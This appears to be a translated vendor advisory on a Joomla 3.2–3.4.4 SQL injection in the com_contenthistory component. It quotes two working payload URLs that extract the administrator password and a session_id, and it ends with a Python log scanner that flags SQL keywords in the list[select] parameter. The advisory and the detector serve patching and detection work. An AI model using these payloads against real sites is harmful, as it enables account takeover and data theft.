SQL Injection Vulnerability in the Well-Known CMS Software Joomla

Source: Internet
Author: User
Tags: administrator password

Recently, Trustwave SpiderLabs researcher Asaf Orpani found a SQL injection vulnerability in versions 3.2 through 3.4.4 of the well-known CMS Joomla. Testing by the Security Dog laboratory found that the vulnerability is highly damaging, affects a wide range of sites, and is easy to exploit. The vulnerability has been fixed in the 3.4.5 release; please update affected websites promptly. In addition, Security Dog has been tested and protects against the vulnerability.

Detailed description of the vulnerability and how it is exploited

According to Asaf Orpani's analysis, the SQL injection vulnerability exists in /administrator/components/com_contenthistory/models/history.php.

The following lines of code, which illustrate how Joomla works internally, help in exploiting this vulnerability (payload):

After the code is executed, the following page is returned, from which the user session can be obtained directly:

The following payload can be tested to obtain the administrator password directly:

http://10.211.55.3/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id =1&type_id=1&list[select]= (select 1 from (SELECT COUNT (*), concat (SELECT (select concat (password)) from%23__ Users limit 0,1), floor (rand (0) *)) x from Information_schema.tables Group by X)


The payload above cannot extract the session_id. After modification by our laboratory, the following payload extracts the session_id reliably:

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1& list[select]= (select 1=updatexml (1,concat (0x5e24, (select session_id from jml_session limit 0,1), 0x5e24), 1))


After gaining a detailed understanding of how the vulnerability is exploited, Security Dog technical staff carried out testing and found that the Security Dog product Website Security Dog can defend against the vulnerability, so users can use it with confidence.
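One way to look for this request pattern in web server access logs, as an added example that is not part of the original article or of any Security Dog product. It assumes combined-format log lines and treats a client-supplied list[select] value containing SQL keywords on a com_contenthistory request as suspicious; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Client address, request target and status from a combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# SQL keywords that appear in the payloads quoted in the article.
SQL_TOKENS = re.compile(
    r'\b(select|concat|updatexml|information_schema|floor|rand)\b', re.I)


def inspect_request(target):
    """Return a reason string if the target matches the injection pattern, else None."""
    query = target.partition("?")[2]
    # parse_qs URL-decodes names and values, so list%5Bselect%5D is seen as list[select].
    params = parse_qs(query, keep_blank_values=True)
    if "com_contenthistory" not in params.get("option", []):
        return None
    for value in params.get("list[select]", []):
        if SQL_TOKENS.search(value):
            return "list[select] carries SQL: " + value[:60]
    return None


def scan(lines):
    """Return (client_ip, status, reason) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m.group("target"))
        if reason:
            hits.append((m.group("ip"), m.group("status"), reason))
    return hits


# Constructed sample log lines (documentation addresses, harmless subqueries).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2015:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Nov/2015:10:00:07 +0000] "GET /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select%201%20from%20dual) HTTP/1.1" 500 312',
    '192.0.2.44 - - [01/Nov/2015:10:00:09 +0000] "GET /index.php?option=com_contenthistory&view=history&list%5Bselect%5D=%28SELECT+1%29 HTTP/1.1" 500 312',
    '192.0.2.10 - - [01/Nov/2015:10:01:30 +0000] "GET /administrator/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, status, reason in scan(SAMPLE_LOG):
        print(ip, status, reason)
```

Hits on a site still running 3.2 through 3.4.4 are worth following up by checking for unexpected administrator sessions and updating to 3.4.5.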


